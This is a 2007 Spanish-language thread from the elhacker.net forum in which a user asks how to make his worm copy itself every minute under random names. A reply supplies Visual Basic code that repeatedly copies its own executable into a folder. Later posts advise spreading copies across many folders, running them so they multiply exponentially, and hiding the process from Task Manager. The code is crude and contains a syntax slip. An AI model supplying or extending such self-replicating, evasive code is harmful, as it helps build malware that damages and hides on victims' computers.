elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Autocopiarse cada minuto
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Autocopiarse cada minuto  (Leído 3,867 veces)
xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Autocopiarse cada minuto
« en: 23 Noviembre 2007, 16:23 pm »

Hola, como puedo hacer para que mi worm se copie cada minuto con nombres aleatorios


En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #1 en: 23 Noviembre 2007, 17:36 pm »

Código
  1. Private Declare Function GetTickCount& Lib "kernel32" ()
  2. Sub main()
  3.    Infectar
  4. End Sub
  5.  
  6. Public Function Infectar()
  7.    Dim Yo As String, Ruta As String
  8.    Yo = App.Path & "\" & App.EXEName & ".exe"
  9.    Ruta = "C:\CARPETA\RUTA\QUE\QUIERAS"
  10.    FileCopy Yo, Ruta & "\" & Aleatorio & ".exe"
  11.    Esperar (1000)
  12. End Function
  13.  
  14. Public Function Esperar(Time As Long)
  15.    tmp As Long
  16.    tmp = Time + GetTickCount&
  17.    While tmp >= GetTickCount&
  18.        DoEvents
  19.    Wend
  20.    Infectar
  21. End Function
  22.  
  23. Private Function Aleatorio() As Long
  24.    Randomize
  25.    Aleatorio = CLng((100000 - 999999) * Rnd + 999999)
  26. End Function

Que lo disfrutes....
Pero deberias haverlo hecho tu :¬¬
PD: Si no entiendes algo pregunta.


En línea

byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #2 en: 23 Noviembre 2007, 19:55 pm »

copiarse cade minuto....... un programa por ejemplo de 1 mb y un ordenador encendido  algun tiempo puede hacer sospechar a cualquiera que algo raro pasa.
En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #3 en: 25 Noviembre 2007, 14:23 pm »

bueno lo unico que no entiendo es lo de esperar :-\
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Autocopiarse cada minuto
« Respuesta #4 en: 25 Noviembre 2007, 17:31 pm »

Pues para esperar un minuto usa un timer. Si necesitas esperar mas tiempo del q alcanza el intervalo del timer pues usas un contador. Lo explico en pocas palabras por q con esta ya lo e debido de explicar como 1000 veces, busca por el foro, q ya esta muy dicho....
En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #5 en: 25 Noviembre 2007, 20:39 pm »

lo de poner un timer si lo sabia pero no esta funcion :

Código:
Public Function Esperar(Time As Long)
    tmp As Long
    tmp = Time + GetTickCount&
    While tmp >= GetTickCount&
        DoEvents
    Wend
    Infectar
End Function
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #6 en: 26 Noviembre 2007, 17:09 pm »

lo de poner un timer si lo sabia pero no esta funcion :

Código:
Public Function Esperar(Time As Long)
    tmp As Long
    tmp = Time + GetTickCount&
    While tmp >= GetTickCount&
        DoEvents
    Wend
    Infectar
End Function


-->VAGO!!!<--

PD: Te he dado un link :)
En línea

black_jjk

Desconectado Desconectado

Mensajes: 21


Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #7 en: 11 Diciembre 2007, 01:34 am »

La verdad se me hace poco ingenioso el código, si lo que quieres es que cada minuto se copie lo del timer esta bien pero deberias probar cambiar el nombre del archivo con algo más ingenioso por ejemplo usar una combinación de carácteres y números en lugar de solo números, además de probar una matríz para los nombres de la carpeta, para que así se autocopie en diferentes carpetas en lugar de solo una en específico, además de crear una lista con la ubicación más de uno de los nuevos gusanos, para que así se puedan ejecutar estos o mejor aun hacer que se ejecuten a tráves de una instrucción, de esa manera la cantidad de archivos se multiplica exponencialmente.
por último te recomiendo que crees un programa que controle al gusanito para que no se ejecute más de n cantidad de veces al mismo tiempo y agregale una instrucción para que no aparezca en la ventana de "Administrador de Tareas".

Creo que con la ayuda que te dieron es suficiente para que lo desarrolles tu, yo solo opino que hay que tener un poco más de imaginación, pero eso es cosa de cada quien, si necesitas ayuda con tu código postealo y luego lo reviso.
En línea

xhc

Desconectado Desconectado

Mensajes: 61



Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #8 en: 11 Diciembre 2007, 16:16 pm »

pero solo es una funcion "secundaria", no creo que se de cuenta de la carpeta donde se copian. Estaba haciendo un worm perohace poco se me jodio el sector de arranque y se me borro, ahora estoy volviendo a hacer uno, en que acabe los examenes y tenga tiempo lo hare, posteare el codigo si queris

saludos :D
En línea

jetrel

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Autocopiarse cada minuto
« Respuesta #9 en: 12 Diciembre 2007, 09:38 am »

que instruccion hay que poner para que no aparezca en la ventana de "Administrador de Tareas"?
gracias
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Este 2011, tres usuarios de Facebook morirán cada minuto
Noticias
wolfbcn 0 1,422 Último mensaje 21 Enero 2011, 02:50 am
por wolfbcn
ejecutar programa cada minuto
GNU/Linux
panchocolate 6 5,891 Último mensaje 12 Abril 2011, 04:51 am
por panchocolate
ejecutar cada minuto python
Scripting
Kase 2 5,176 Último mensaje 5 Agosto 2013, 10:26 am
por -Mc_Raaka-
[AYUDA]Como hacer que mi reloj se refresque cada un minuto (c)
Programación C/C++
VintageChanel 3 2,112 Último mensaje 16 Enero 2015, 16:13 pm
por VintageChanel
Se crean 5 nuevas apps consideradas malware en Android, ¡cada minuto!
Noticias
wolfbcn 0 1,172 Último mensaje 19 Junio 2015, 18:14 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines